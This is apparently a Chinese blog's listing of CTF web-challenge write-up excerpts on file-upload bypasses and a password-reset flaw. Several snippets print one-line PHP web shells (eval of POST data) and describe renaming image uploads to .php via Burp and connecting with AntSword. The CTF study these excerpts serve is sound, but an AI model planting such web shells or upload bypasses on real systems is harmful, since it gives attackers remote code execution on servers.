Web漏洞
未读
CTFshow-文件上传(Web151-170)
CTFshow-文件上传(Web151-170) 参考了CTF show 文件上传篇(web151-170,看这一篇就够啦)-CSDN博客 Web151 要求png,然后上传带有一句话木马的a.png,burp抓包后改后缀为a.php,然后蚁剑连接,找flag <?php eval($_POST['
Web漏洞
未读
攻防世界39-bug-CTFWeb
攻防世界39-bug-CTFWeb dirsearch扫描无果,用sql注入测试失败,注册登录 Manage要管理员权限,这题的关键那应该就在获取权限上,在外面的找回密码。 burp抓包看看,拿刚注册的账号密码试试 发现分为两步,第一步提交信息,第二部修改密码
Web漏洞
未读
攻防世界35-easyupload-CTFWeb
攻防世界35-easyupload-CTFWeb 通过各种上传发现,过滤了php后缀和内容中有php的文件 有这几种方式上传一句话木马 <script language="php">eval($_POST[1]);</script>
<?php eval($_POST['cmd']);?>
<?=
Web漏洞
未读
攻防世界19-upload1-CTFWeb进阶
攻防世界19-upload1-CTFWeb进阶 跟上传有关,随便上传一个文件,提示上传图片 发现有disabled 解法1: 删掉试试,发现可以上传了。 试试上传这个